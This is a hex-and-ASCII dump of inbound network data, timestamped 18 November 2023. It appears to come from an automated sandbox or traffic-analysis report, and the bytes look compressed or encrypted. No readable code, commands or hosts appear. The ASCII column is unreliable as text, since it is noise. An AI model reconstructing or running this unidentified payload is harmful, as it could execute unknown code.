f7 e1 80 6f 21 dc b9 40 9f 87 d2 64 1c ce a6 b2 18 37 0d cd 0d a3 b1 69 0d fe f0 61 55 7c 0d 69 ec 99 43 68 fa 9d 3b 37 8e af 70 23 60 18 70 83 11 9e eb e3 43 84 86 Data Ascii: X{*Bw##7b4Oe0ea1#?lhwbB`&,,f,!,o:a.#c=Xo/Xl#,G%,l7b",2bcB;=BqcSalj4gSaU(5aU\|i;o!@d7iaU\|iCh;7p#`pC
2023-11-18 09:02:40 UTC	7008	IN	Data Raw: 94 d0 0d 9e e3 af 89 f7 ff 63 ef 3f c0 a2 68 9a 47 71 b4 07 58 72 ce 99 25 2c 51 96 9c 73 06 25 0a 98 25 2f c1 25 c9 12 45 05 44 54 54 44 45 c4 2c e6 80 88 19 11 15 10 73 42 51 44 41 05 45 c5 8c 39 3b 7d 7b 66 17 58 d0 f7 7b bf df 39 ff 7b cf 79 9e fb 9f a5 a8 ae ea 9c aa ab c3 4c 9b 23 43 2a 37 e3 af 34 51 85 ac cc 4c a2 49 8f b6 c9 49 cb 88 e3 66 0e 16 dd 20 cd 4a 4a 49 4f 1e f2 36 d8 93 46 92 a8 cc 22 63 50 bb 89 4d 1c b4 60 a7 13 e5 2d 29 96 39 c8 1b cc 43 40 50 60 18 77 25 a6 a4 27 99 c7 a4 12 26 0e 23 38 28 c8 7f b0 b2 89 26 39 88 87 9b e6 78 2f 8f 60 ee 20 32 c8 e8 88 aa 66 31 d8 59 62 11 ec d0 30 37 8f 71 91 e9 59 2c 32 5d 59 ac ac 98 91 1d f4 9d 00 ef 6e be 08 e2 fd 57 de 3a 02 bb f2 f3 9e 24 30 10 e4 bd 45 e0 60 7e de d7 04 8e e2 e7 e5 a1 44 10 Data Ascii: c?hGqXr%,Qs%%/%EDTTDE,sBQDAE9;}{fX{9{yL#C*74QLIIf JJIO6F"cPM`-)9C@P`w%'&#8(&9x/` 2f1Yb07qY,2]YnW:$0E`~D
2023-11-18 09:02:40 UTC	7024	IN	Data Raw: cf 39 bc 0c 6e fd 60 90 08 4b 03 ff cd 33 3a 5c 22 fe 74 a4 27 a4 9b 78 33 f9 b8 e2 9f 83 78 bd 2b a6 32 e3 e8 d1 c9 c9 41 19 de 49 19 ac cc 30 a2 10 e2 e8 9c 18 fd 93 08 5d 83 78 16 49 0e 87 75 7f 32 3b 7f 4b b9 ee 8a 7f c3 09 8b d4 0b c2 c2 c6 fb b9 87 87 79 85 b2 f3 34 f8 3d 3d 7d 34 86 df 98 32 65 a8 0f 72 f3 86 18 dc 65 85 0d 7f a3 90 18 f7 a3 4c fe d4 0d 83 4d d9 bc 38 3a f9 e9 dd 38 3a 6b b8 e3 c7 d1 19 23 46 4b e4 86 7b 54 27 ac b9 95 02 54 0c 7f 28 34 71 f4 d8 51 8a c6 3f 3c 72 08 96 13 85 ca 29 8f 6a 94 2f c9 45 ee 4c f9 51 fc 5d 04 9f ee cd 54 18 c5 3f 42 f0 51 fe 94 46 f1 cf 22 3e 15 f1 95 47 f1 6f 21 be 29 e2 5f 1b c5 ef 43 7c 57 c4 97 e6 1d c9 ff 8a f8 c1 88 1f 47 4f 23 24 03 58 ce d5 36 2e 22 1d 6c 39 6a 2f 83 59 45 7d c5 2d 39 01 f5 84 cc Data Ascii: 9n`K3:\"t'x3x+2AI0]xIu2;Ky4==}42ereLM8:8:k#FK{T'T(4qQ?<r)j/ELQ]T?BQF">Go!)_C\|WGO#$X6."l9j/YE}-9
2023-11-18 09:02:40 UTC	7040	IN	Data Raw: 03 01 2a 8e 7f c2 3f c3 5d cb cf c0 39 33 15 e0 81 bc a3 60 51 d8 4d b0 98 5f 1d 4e 36 55 05 9a eb c5 a1 d2 bb 75 a0 ec 5a 0a e6 cd 72 86 b2 fa 4c 7c f1 ba 0b 30 a2 e7 31 dc 58 a3 0b b6 1d 54 c2 8d b3 79 a1 f8 43 05 ec e6 e9 10 98 9d ff 1c 13 eb 60 c0 7c 9b 7c 5c e5 cb 0e 60 1e eb 0f 97 de a1 c2 68 37 0f a8 28 aa 0a f6 4f 08 c4 5c bf 46 81 ea 85 1e c0 dd e6 23 ac b8 1a 05 95 f9 35 61 8c 45 28 b6 b6 e3 06 e4 39 6e 0d 95 ba 44 80 99 c7 17 5c ba d2 17 8a 29 f9 02 c3 a0 3b c0 90 4f 17 53 59 b2 1c 56 36 2a 00 e9 ed f3 c1 e7 b0 e3 78 ee f9 44 38 b7 2b 0a d8 66 bd 84 62 6a 77 70 4f 13 61 b8 6b dd 7c 7c 8d ee 79 e0 7e 68 32 bc 48 af 81 62 b1 a1 b0 bd f1 37 dc 6b 6c 88 2d be 39 1b dc 41 6d 53 f4 d9 06 10 af 93 8e f3 56 78 00 cb ce 7c f8 a2 c6 1a c6 94 3a 83 af 5d Data Ascii: ?]93`QM_N6UuZrL\|01XTyC`\|\|\`h7(O\F#5aE(9nD\);OSYV6xD8+fbjwpOak\|\|y~h2Hb7kl-9AmSVx\|:]
2023-11-18 09:02:40 UTC	7056	IN	Data Raw: a9 f7 e0 aa 5b ee 34 52 62 85 2d 16 e1 f8 f2 51 13 1c 1d 77 92 1e 61 ff 83 83 2e a3 71 fc 8b 95 b0 ea fd 7c fa a9 68 11 98 66 df a3 3a ee ef 51 b0 7b 35 ae bd fa 19 ce 28 6c 46 cd 6e 7f 88 0d f9 40 16 fe dc 00 ff 66 bd c1 81 55 53 40 2b 56 96 76 a9 9a c1 92 50 39 7a 3a 79 3b 4c 3a d7 48 9b 67 4c 44 56 c7 2f fa f7 ba 18 a7 c1 24 fa ed 3b e2 55 4d 01 fd f7 fe 0f bc f7 3c 0a 38 9b 83 37 d2 0a c9 86 ed 09 b8 a5 61 1d ed d4 c9 c2 e6 2f 40 5a f4 3a 30 cc 37 01 3d 9e 94 c3 fa 8b ba 94 93 60 02 b2 97 fe f3 56 bb ad 70 84 bd 86 dc f4 d3 45 ef 1d 8b b0 cf bb 18 ee 1d 0a c7 48 df 4f 70 4b df 8e cc 7e 52 82 99 19 be 44 73 e7 21 18 6b cf a1 51 f1 3b d0 6f 5e 22 34 d8 3b c3 19 f7 89 f4 76 ec 1f f8 fc 72 16 fc ae 8e 45 fd 1d 72 30 d8 96 06 9f 7e f5 e0 d2 ec d1 b8 eb bb Data Ascii: [4Rb-Qwa.q\|hf:Q{5(lFn@fUS@+VvP9z:y;L:HgLDV/$;UM<87a/@Z:07=`VpEHOpK~RDs!kQ;o^"4;vrEr0~
2023-11-18 09:02:40 UTC	7072	IN	Data Raw: e7 9e de 42 10 8a 0e f3 3c c7 9e 24 82 ce 58 e1 19 7f 63 9e ce 6e 29 e7 e3 e7 16 4e cb 8f 75 a2 cb 75 c9 d2 2d 0b 2f 89 57 ee b9 c8 85 69 52 c9 49 ef cb cc 1b 37 d5 c9 a6 13 c3 a0 b8 f6 19 78 6a 6a 08 b2 7d ab a4 8b 7e f4 31 7e 94 29 73 3e ee 8e 27 b7 7f ee 91 58 5c fd cb 7a b8 5a 4b 32 71 b5 9c f8 dd 76 37 8e de e1 8f d2 ca 4c 05 96 ea cc 78 c9 fc d9 b3 80 b3 3e 81 bd f7 07 91 6e 0b 63 b2 87 4d c2 59 4b 42 b8 bc 78 49 00 5b a7 61 88 c5 38 f2 53 da 21 7b 4d 74 e6 e3 0c 9e 89 44 8d 3c 6f 9d 40 a2 9d 33 f9 5a d7 d9 e2 33 c9 a7 39 4b 7a 8f 90 f8 bf 79 0c a7 b1 3c 61 f8 c1 3a ee f6 3d e6 c2 fe 2e 0e 9b 6b 50 2c 26 2a 3f 19 bf 8f e9 31 15 6f 3c 91 44 46 ba f3 ac 97 3c 95 56 34 c4 89 ff 84 ae 15 b6 4c 74 25 fb 56 77 72 85 57 a3 b9 36 d1 df d8 fb 1c 03 38 7b e5 Data Ascii: B<$Xcn)Nuu-/WiRI7xjj}~1~)s>'X\zZK2qv7Lx>ncMYKBxI[a8S!{MtD<o@3Z39Kzy<a:=.kP,&*?1o<DF<V4Lt%VwrW68{
2023-11-18 09:02:40 UTC	7084	IN	Data Raw: 01 aa 5c 31 99 36 fe 78 2f dc d8 2f 18 c6 f6 a5 ab 89 97 6c f5 09 95 22 08 37 6b ce 56 c2 80 91 78 da 8a 8f ae 30 f4 fb 24 e6 1e 73 30 63 ec bb c7 70 d9 d2 5b 50 e5 bb a1 cc f3 4f 7f 61 36 6e 14 50 d5 60 57 d8 48 b7 07 29 28 bc 27 ee e6 d7 ef 8c ac 7b 6b c9 b4 1b ae 8c 94 6d 39 f0 b9 a8 26 82 d9 fd 7c 8a 1a 76 25 a9 6f a0 25 46 7f ff 13 8a f8 3e 9b 72 e2 77 04 bd d7 8b ab 54 03 ee 49 dc fa d3 9e a4 fa 28 73 68 d6 c9 7e f8 07 92 f9 70 20 6f 35 9c 3b 6d 23 66 7c 51 3a 79 d6 a9 91 d0 98 c5 42 ac 41 f6 66 7c fc 9e e1 b0 7d ce 03 ca 9b f2 cf d0 b1 a0 a5 a4 0b 6b ab a1 4f 7e 4c 5c bf 88 75 cc 9c c7 fd a1 6a cf 1a ba f0 db 3b e2 d6 da 79 38 bf d7 fb f0 7a ee a7 61 38 43 c2 a8 1a b1 16 a7 5b ef 84 8f 9c b6 95 de 77 f8 2d 7c 0d 6b 0b 61 e3 4e 47 a2 99 4b 36 f3 25 Data Ascii: \16x//l"7kVx0$s0cp[POa6nP`WH)('{km9&\|v%o%F>rwTI(sh~p o5;m#f\|Q:yBAf\|}kO~L\uj;y8za8C[w-\|kaNGK6%
2023-11-18 09:02:40 UTC	7100	IN	Data Raw: dd 5d 1d d8 60 22 30 9a 82 04 0c 12 b3 db 4e 54 b7 a1 b4 1d a9 de 4e 49 7a 2e 77 7b 2d e9 2a 5e 41 ad b3 43 d7 15 2e 5b bc ec 77 05 9d 85 9f f0 14 40 ff f1 12 ed 94 c6 51 07 b0 64 cb df c5 37 e6 ff d0 be b2 1d a0 ad fc a5 7d 54 3c f2 ff 7f cf 3e d1 6e d0 5e 73 ff 7d 1c 94 ff 65 fb a0 6d ff 6c 9f 93 23 f2 48 a5 75 d2 8b 50 5d 38 59 5f 66 1f 5e ea 90 6b 6e af 20 c1 42 e0 44 c7 40 ff da 04 fa 7e 3e e8 d7 7b 80 7f 3f 18 23 80 0d d9 7b 81 1f a0 68 23 08 db d8 d1 a6 2a 05 9e 37 90 ab 53 a0 eb b6 83 b8 80 63 2b d5 3f ab c8 53 50 75 10 f0 b7 82 b1 68 97 a7 c0 c9 51 fa dc a8 2d 37 28 dd 69 7e 90 f6 3b 46 66 bf 77 ef 20 c1 84 de 7f b6 9f fd 1f ec 67 01 57 b5 f9 cf f6 4f 50 ac 8a 09 ff 5c 13 54 7c 5b 1b 67 f5 09 12 f4 e8 f3 0f e5 bf b1 eb f6 43 87 ff dc 6e 54 da df Data Ascii: ]`"0NTNIz.w{-^AC.[w@Qd7}T<>n^s}eml#HuP]8Y_f^kn BD@~>{?#{h#7Sc+?SPuhQ-7(i~;Ffw gWOP\T\|[gCnT
2023-11-18 09:02:40 UTC	7116	IN	Data Raw: 5c 02 46 44 4d c5 8e e7 ea f1 00 92 c4 96 33 d6 96 b1 3a 03 fa 53 b6 f8 95 5b dc c9 c6 ed 4f 8d 9e ec a8 5b 94 65 49 a4 29 00 36 ff c2 74 2b 63 9d 95 83 2d f3 ca f6 07 22 bc 01 67 a6 aa a6 36 a2 46 55 b4 a6 64 b4 0b 25 fe 57 d3 7d ee c8 1f 3e 7f 09 db 8e b2 4e 3a 39 b0 59 d5 19 28 8a 1f d6 aa 53 41 ac 4d c4 3a ea 14 6f e2 77 97 07 46 ab 8a 30 72 93 28 d8 d4 94 b2 9e 1f b8 bd 8b f8 11 06 ed fb b6 f6 56 cc 8d c8 f3 d5 74 35 15 f1 3a ce d8 a3 fc b9 56 2d 8f f2 c1 20 85 ee 17 0f b5 b1 69 c8 f8 e8 76 88 c7 f9 fd 0d 24 60 b5 bf aa 0e 4f 70 bd 3a 26 c3 63 70 ce 8e d5 e6 7d 1b df 9b 8d ed 4e 35 31 2e 88 ae ba 89 b6 b3 30 55 c3 ac 57 d6 26 52 aa 33 08 d5 9f bb 50 4d ca 30 34 e5 ee 0f 5d 7e 8f 9f 2c 8c 0b dc 3e 4a 62 9c 76 10 4b c9 b3 a3 0e 49 4d 54 fb a3 48 57 65 Data Ascii: \FDM3:S[O[eI)6t+c-"g6FUd%W}>N:9Y(SAM:owF0r(Vt5:V- iv$`Op:&cp}N51.0UW&R3PM04]~,>JbvKIMTHWe
2023-11-18 09:02:40 UTC	7132	IN	Data Raw: ca 57 29 72 91 ac 0e 5b 92 1a 24 0b 17 a8 ab ab eb 1b a6 1a 58 6a 60 ab 41 48 0d 12 d5 20 59 0d 52 d4 e6 83 4e d4 89 a6 3a d1 34 27 9a ee 44 33 9c 68 a6 13 cd 72 a2 d9 4e b4 ba 13 ad 59 79 d8 56 3b 86 e9 24 5a 63 d1 18 c7 2e 76 6c db b1 4b c2 cb 6b 2f 5e f1 63 e9 18 a3 d4 89 56 93 3d b3 1c 3b e8 d8 c9 8e 5d 79 ce fc 7b 76 a8 63 44 0d e4 b6 1c 6d 69 5b b2 5a d4 1d 1b 25 45 96 29 17 96 be 43 f4 91 4a b7 12 9d 68 2d 6c 3a 18 0c b9 97 16 17 06 97 26 97 ca 6d 2e 13 2b f7 f7 de 16 a6 91 a3 47 b9 1c 45 2c 43 8f 2c 3d 52 c7 ca 36 9c 68 81 13 cd 71 a2 f9 25 63 f1 3d ee 4b b2 e1 8d 4c 3d b2 f4 c8 d6 a3 a0 1e a9 73 20 39 e2 5d 39 e2 5d 3b e2 5d 3d e2 5d 3f e2 4d 10 d1 33 84 b3 d5 20 47 0d 72 f5 e9 98 ab cf c7 3c fd 10 53 0f d7 60 2a 1f a8 3c 7e 26 0f 9c a9 af 93 a6 Data Ascii: W)r[$Xj`AH YRN:4'D3hrNYyV;$Zc.vlKk/^cV=;]y{vcDmi[Z%E)CJh-l:&m.+GE,C,=R6hq%c=KL=s 9]9];]=]?M3 Gr<S`*<~&
2023-11-18 09:02:40 UTC	7148	IN	Data Raw: 60 13 6d 49 f7 40 97 2e 01 72 af 04 f6 13 0c 5d 91 09 ec e2 20 99 a8 01 bb 99 0b cd 77 04 c8 b8 35 a0 e7 29 e8 8a c3 d0 dc 62 40 f5 91 80 ca a3 81 c4 82 80 d4 da 42 97 ef 01 96 40 d0 22 09 9a 6d 3f 90 ae 02 50 a7 0e d8 48 32 a0 d1 28 60 7f 55 40 86 8b 80 4c 0f 01 aa 2f 06 94 af 00 52 6e 0b 6c ef 28 b0 94 30 82 06 80 3a 22 60 63 7b 81 35 89 a3 6e 5c 3c 09 68 7d 04 d8 65 06 a0 e8 9c 2e b0 60 02 74 3d 0c 2c 6b 14 90 c5 12 60 05 c1 40 9e 07 80 f5 b5 84 ae 3b 11 38 67 d6 3c e8 f6 05 80 be a7 80 5d 64 00 6a ed 81 ae 0e 00 52 3c 00 64 b8 10 ba 68 34 a0 c4 4c 60 55 7b 80 b5 32 80 ce 87 80 54 09 59 b5 00 16 22 02 74 4b 05 52 51 40 37 07 01 2a 1f 03 d6 bb 18 d8 cc 02 60 47 0a 40 d9 25 80 3e 07 81 4c d2 80 95 9e 00 96 ad 80 6e af 00 34 3d 0e 5d be 10 58 dd 6c 60 2d Data Ascii: `mI@.r] w5)b@B@"m?PH2(`U@L/Rnl(0:"`c{5n\<h}e.`t=,k`@;8g<]djR<dh4L`U{2TY"tKRQ@7*`G@%>Ln4=]Xl`-
2023-11-18 09:02:40 UTC	7164	IN	Data Raw: e8 5e 1b 78 a5 8b 86 74 a3 a8 cd 62 32 0b c3 49 24 bf 1f f3 4e d0 71 82 9d 8b a2 30 db 10 e5 28 d4 0f 89 8d 65 03 86 4c 35 fb 54 16 17 1d cd 0a 83 09 9c b3 c9 c2 c6 1a 79 b2 67 32 35 b6 9a c8 61 c1 6c f6 5c 0f 6f 41 66 88 32 a9 3c d9 78 ee 6b a7 52 f1 a6 7f 95 e4 0f 5b fe 19 50 ee 7a 28 77 25 7f 7f e9 04 9d 6f 57 b2 6d 4c 60 ab 78 b0 96 2c ec 15 80 49 00 77 ab 79 3a de 6f 9c a0 ba 3e 95 ec f8 4f 60 1f 02 ac 81 fd 46 20 0b 3b ce cb 2f 88 85 5d 3d 41 f7 32 2a b9 be 01 77 fb 04 a5 0f 42 71 0a 27 7b 63 9b dd dd 3c f7 9c 1f 9c 3d 49 f7 7d aa 79 f5 bb c0 c2 c8 99 23 72 91 4e 73 8a 8c 91 a7 e8 f7 ab 79 6d 16 7d ea be f5 af 29 ff 80 15 35 5f 93 26 95 7b a8 f0 cd a3 06 68 22 f1 59 ff 74 99 f6 5f be 37 fa bf 7c 6f cc 7f f9 5e fa 7f f9 5e c6 7f f9 5e e6 7f f9 9e bf Data Ascii: ^xtb2I$Nq0(eL5Tyg25al\oAf2<xkR[Pz(w%oWmL`x,Iwy:o>O`F ;/]=A2*wBq'{c<=I}y#rNsym})5_&{h"Yt_7\|o^^^
2023-11-18 09:02:40 UTC	7180	IN	Data Raw: 24 1e 25 bf 77 2c fb 29 9b 75 0c d9 45 92 c4 ef 3a 70 5e 6b e7 1c 27 31 6d 9b cb 7d c1 49 dc bf d5 e3 64 ee 15 6b 79 f6 aa e1 5e 8e 69 0f d3 2c a6 b9 61 9e bb 98 76 30 ed 26 26 b3 4c f7 51 2e a9 7d 36 f7 72 55 2c 53 e1 92 ba aa 59 8e f9 5e e6 25 ca 48 4c b3 48 97 b0 8c c4 b4 83 65 3a 99 af 14 9f 41 a8 a3 2d 90 4e a4 ad 4c bb a7 83 69 fb c4 5d a4 b6 9b d8 f6 5b 76 91 7a 6f a5 ff 98 ca 37 93 b6 ed 2a b5 39 f0 2f cb ed a0 9c 7d 57 9e 2b b9 67 24 9d c5 b4 6b 27 b1 63 c9 1f cd 7d 63 36 f7 8a 47 93 57 b8 ab 24 e5 50 6e 38 f7 99 e4 49 47 11 5b c5 f9 e4 2a 8b 54 d2 e0 94 24 ce 6d f2 3a ce e9 6b 38 bf 70 fd 6d e7 ba 9a fb e1 ae 52 f4 bd 5d a5 6e a6 95 ef 72 5f fa 0e cb 6c e1 fe f3 1b d2 3f 51 07 3a 99 2f d9 ca 7c 0f b1 4f 58 1f d3 de 6d 2c f3 0b e5 3f 65 fa 35 d3 Data Ascii: $%w,)uE:p^k'1m}Idky^i,av0&&LQ.}6rU,SY^%HLHe:A-NLi][vzo79/}W+g$k'c}c6GW$Pn8IG[T$m:k8pmR]nr_l?Q:/\|OXm,?e5
2023-11-18 09:02:40 UTC	7196	IN	Data Raw: ef 07 de 0f bd 1f 79 3f f6 7e e2 ed f1 7e ea fd cc fb b9 f7 0b ef 97 de af bc 5f 7b b7 7a bf f1 7e eb fd ce fb bd f7 07 ef 8f de 9f bc bd de 9f bd bf 78 7f f5 6e f3 fe e6 fd dd fb 87 f7 4f ef 5f de bf bd ff 78 b7 7b ff f5 ee f0 ee f4 4a 3e 8b cf ea b3 f9 ec 3e 87 cf e9 73 f9 dc 3e 8f cf eb f3 f9 fc be 80 2f e8 0b f9 64 5f 3f 5f 7f df 00 df 40 df 20 df 2e be 5d 7d bb f9 06 fb 86 f8 76 f7 ed e1 db d3 b7 97 6f 6f 5f 96 6f 1f df be be fd 7c 43 7d c3 7c fb fb 0e f0 1d e8 3b c8 77 b0 ef 10 df a1 be c3 7c 87 fb 8e f0 65 fb 86 fb 72 7c 23 7c 23 7d a3 7c a3 7d 63 7c 63 7d e3 7c 47 fa 8e f2 1d ed 3b c6 77 ac 6f bc 2f d7 97 e7 9b e0 cb f7 15 f8 0a 7d 13 7d 93 7c 93 7d 45 be e3 7c 53 7c 53 7d d3 7c c5 be e9 be 12 df f1 be 52 5f 99 af dc 37 c3 37 d3 37 cb 37 db 37 c7 Data Ascii: y?~~_{z~xnO_x{J>>s>/d_?_@ .]}voo_o\|C}\|;w\|er\|#\|#}\|}c\|c}\|G;wo/}}\|}E\|S\|S}\|R_77777
2023-11-18 09:02:40 UTC	7212	IN	Data Raw: 2e ed 63 fc 9b 9c 2c d3 19 86 e3 20 e3 74 69 08 eb 8f 87 8c 13 66 66 38 7e 5c c4 7f 0e 58 7c d0 ad 2c 6f 62 fc 4d db 44 6c 42 de a4 c4 fb ba da 80 21 5f bd 05 8d a7 c5 67 5f d3 ef e9 1a 83 91 58 46 48 b3 ac fa d3 46 b5 b5 da 24 4f 69 91 45 e2 4b af 89 98 68 9e a1 05 89 50 e2 65 ff ec 8a e8 58 f1 13 21 7d 65 2e a8 51 c6 9a 67 aa ef 75 f4 95 d5 d2 d0 47 8e 5a 61 f2 83 b6 c6 32 da 3e 48 c6 d4 e7 35 f5 57 23 fa ca 50 4c 73 4c 37 2b 9e 63 b6 4d f1 c7 c2 aa ba b0 79 6d f1 1b e1 8c 8c e1 a6 9d 10 cf c8 ec 82 7a f5 6f 5d d6 c7 8f c9 cc 2c 93 70 e6 5e d3 ec 7e f1 0e 72 7e 59 89 f8 34 ba 78 39 5b 1b d6 b6 4a a4 eb 5a 22 e1 a6 da 86 a5 4d 26 65 75 79 e2 05 bc 3e f3 c4 cb 7d 9a 4c f1 41 00 4d b2 a1 99 47 0e 31 fe 6a b5 51 d1 a5 c6 74 aa 8b e3 63 22 99 4a 7e 24 5b d1 Data Ascii: .c, tiff8~\X\|,obMDlB!_g_XFHF$OiEKhPeX!}e.QguGZa2>H5W#PLsL7+cMymzo],p^~r~Y4x9[JZ"M&euy>}LAMG1jQtc"J~$[
2023-11-18 09:02:40 UTC	7228	IN	Data Raw: 1b 9a 8f 99 81 d6 9d 56 27 7b b6 dd c6 49 87 ce 4c 74 df 72 bb 7b af 72 9d ed 1b bb 48 31 57 ec 0c fe 8a 45 76 6f 43 16 e5 aa bf a8 7d c9 57 b6 90 ed 1b 73 57 9c aa 3c aa 3e a4 9d d0 4f 92 29 76 19 b4 69 23 be fe 7c 85 38 43 4c 65 09 5f d8 88 c7 6e 37 d2 db bc df 7b 18 8c 5b 07 8d d7 88 e7 87 27 26 8b 07 c4 2a a8 c0 3b a4 42 a9 42 4a 94 7f 90 65 25 11 31 cc b4 94 ef 33 ad 32 4f 98 6c f5 e2 b4 45 ed 66 ce ab d0 da e3 dc 24 28 ca c5 6e ae bb c5 7d ce 7d 09 0c 7c 1c be f1 3b f8 79 56 7f 8f f4 ae f7 46 02 4b 26 79 0b bd bb 30 c7 9b bc 17 bc 3d de 11 ef 7d a6 85 6a f1 be 7e 4c 37 37 13 db 88 bd 45 59 8c 86 87 98 2c de 2e 2e 16 97 8b 8f 8a 4f 89 2f 89 7b c5 e3 e2 29 f8 e3 9f c4 1e 52 a4 14 25 0d 92 a6 48 a9 d2 02 68 a5 8d 52 be b4 53 7a 19 8c f2 a1 f4 8d 74 4e Data Ascii: V'{ILtr{rH1WEvoC}WsW<>O)vi#\|8CLe_n7{['&*;BBJe%132OlEf$(n}}\|;yVFK&y0=}j~L77EY,..O/{)R%HhRSztN
2023-11-18 09:02:40 UTC	7244	IN	Data Raw: a8 d3 18 88 fe b3 3c 12 18 fe ac 52 a7 f4 c2 3b c5 6b 59 5a 81 66 e9 e3 f5 2f f5 49 c6 43 c6 23 c6 2f c6 48 72 84 9c 21 f7 d2 17 69 27 f3 46 73 8a b9 d5 dc 67 5e 6b 4d b4 de 44 dc 36 b1 5b db c3 ed 31 76 3e b8 ef 3d 70 df 97 40 b8 5c e7 31 68 a0 0f 9c 95 ee 3b 18 23 41 0c e1 e7 76 07 8a a9 62 01 a2 eb 46 29 0b a3 7f ad 3c 51 7e 58 2e 97 5b 20 7b 17 29 3b 94 08 bc f7 02 b5 12 cc 10 aa c5 6b 2f 6a 54 7f 51 a7 78 ff 22 a3 09 89 24 83 f0 fe bd e8 18 ba 16 68 17 68 c6 98 33 f1 49 cb cc 1f a0 d1 e3 ac b1 f0 28 ef 02 b3 86 db df db 11 bc 5a da de 1d e8 16 b8 8d bc 51 de 64 6f b9 57 c4 cf 34 0b 11 aa 71 0d c3 a5 0f a5 4f 31 4b 2d e4 5b 81 b4 5f c9 c1 0a 55 06 2a 13 95 f9 70 03 eb 95 7c f0 d6 55 6a 1f e0 e3 00 f5 16 b8 d2 45 40 8d 0a d5 5f eb a9 29 40 8c 99 da 7c Data Ascii: <R;kYZf/IC#/Hr!i'Fsg^kMD6[1v>=p@\1h;#AvbF)<Q~X.[ {);k/jTQx"$hh3I(ZQdoW4qO1K-[_U*p\|UjE@_)@\|
2023-11-18 09:02:40 UTC	7260	IN	Data Raw: 64 45 d2 35 d2 b0 a6 3a c9 b4 ae af 93 3a 23 24 8f ea ed 6e 96 17 7b 82 3b a3 24 2f b8 ac 91 c9 97 f4 a2 56 29 d3 a5 b6 8b 59 cc d9 8b e5 a5 2a 24 7e 55 ab 1a 15 14 dc 4d c5 98 cb 59 e5 a5 0a d4 0e 14 dc 43 25 61 0e 7a d1 a0 6b d5 95 d2 7c b9 88 82 67 53 a0 83 23 42 c3 cc ac d4 80 bd 14 e0 38 92 af ab 46 dd 47 a1 7e 0a ad 1a f9 1c 0a 6d a2 50 7d f4 73 a9 74 88 ab 94 ab 79 3b 7f d8 d0 88 07 50 70 3f 15 8f 70 a6 91 d3 3d e2 f3 a8 f8 54 6a eb 82 a5 67 b4 6c 3e 97 b7 ab 28 f8 d9 28 f1 f1 0e ae 41 78 80 0a cf e0 2a 5a a6 aa 55 2c 23 63 64 0d 10 9f 4f c5 67 72 15 62 97 36 0f f3 aa e8 19 03 05 2f a0 f2 b3 38 b3 91 7e 21 15 7f 86 33 57 d1 2f a2 f2 9d 5c 85 da 06 0e a8 82 81 17 53 e1 2e ce f4 0a 3f 47 85 bb 21 f8 24 7c 21 7c 1a 4d 84 0b e9 e7 55 41 52 a7 c3 b5 c8 Data Ascii: dE5::#$n{;$/V)Y$~UMYC%azk\|gS#B8FG~mP}sty;Pp?p=Tjgl>((AxZU,#cdOgrb6/8~!3W/\S.?G!$\|!\|MUAR
2023-11-18 09:02:40 UTC	7276	IN	Data Raw: d0 e7 2e 8a 37 80 0c e8 73 4f 4d 04 09 d0 e7 9e 36 71 95 2d 09 22 a0 cf 5d dc bb 29 07 c2 ff c1 27 a0 fb 14 9e bd d7 80 3e f7 d4 39 a7 d0 57 ac 17 0d 59 f9 23 7b e8 48 14 68 c1 2a 34 ed e0 40 4a e1 8b df ca 2c 5c 69 57 1f 0d 77 8f 22 3b 11 99 3e 6f d1 d0 e9 56 b1 b0 dc a9 6d 0b cf 6e ca 33 46 e9 af f9 c2 0a a7 87 4e 5a e5 69 6c 7a 25 9b 76 c3 91 bb 14 d1 ae 79 db c2 2a 27 4f 6b 55 1e 73 37 29 fc 86 af a5 31 77 6c 8f 4e 63 ee a2 5d a6 96 c6 dc d1 c9 42 2d 8d b9 9b 54 8c 76 6d 7a 88 4d 2d c6 87 28 b2 dc 24 e6 ee 65 9a af 47 05 97 12 02 d1 92 2e fa ff f9 d9 b4 c0 9e 8a 43 67 b3 d2 99 b4 c4 08 81 68 15 2b ad 0f ff d4 33 d2 f1 66 70 5d 9b 8e c7 75 73 3a 5e e4 d1 a6 e3 45 8a 39 1d 2f 92 5b a6 e3 71 97 21 1d 8f 1b 32 d3 f1 cc 36 90 8e c7 4d ed a5 e3 71 7f 9b e9 Data Ascii: .7sOM6q-"])'>9WY#{Hh4@J,\iWw";>oVmn3FNZilz%vy'OkUs7)1wlNc]B-TvmzM-($eG.Cgh+3fp]us:^E9/[q!26Mq
2023-11-18 09:02:40 UTC	7292	IN	Data Raw: 3d b8 a5 81 d5 18 46 ce b5 1e 7c a0 0e 1f ac 94 98 b8 d6 83 1a e5 0f 46 4a 4c 5c eb c1 6a 1a bd 0c 69 e9 d5 15 7c df 24 23 04 e3 7a 30 45 4b 6e e0 ce 5b f8 7e 9c 04 31 88 d5 83 93 44 98 12 2b e3 7a b0 59 14 2e 31 33 ae 07 cf a3 91 15 32 de b0 cf a6 f1 5b 24 bb c4 b8 1e bc 90 96 2b 05 b2 0b a9 d5 83 f3 cd 56 9d 71 3d 78 a9 cd 2c 18 d7 83 8b ed 0e ce b8 1e ec 14 8e 58 96 71 3d d4 54 8a e3 5d 9a 4e f3 84 86 95 4b ba d3 98 ed a8 95 af 49 60 06 e4 f5 7b 17 76 98 7d 7a 8e 64 45 fc 53 7c 62 ea b9 16 00 aa 04 e8 c8 ac 49 83 bb 2a 71 38 49 88 67 77 12 9f f6 98 bc 24 44 6b 7c a9 14 21 11 3c a1 49 3f 5e b8 24 d2 ce b3 32 53 81 21 28 d4 10 59 86 ef d9 d3 da ea 91 28 29 40 fa a1 b1 08 1f 45 c1 cc 60 51 a6 1e 84 c0 a5 58 17 96 4b f3 25 42 fb d7 22 dc eb f9 39 34 a9 4c Data Ascii: =F\|FJL\ji\|$#z0EKn[~1D+zY.132[$+Vq=x,Xq=T]NKI`{v}zdES\|bI*q8Igw$Dk\|!<I?^$2S!(Y()@E`QXK%B"94L
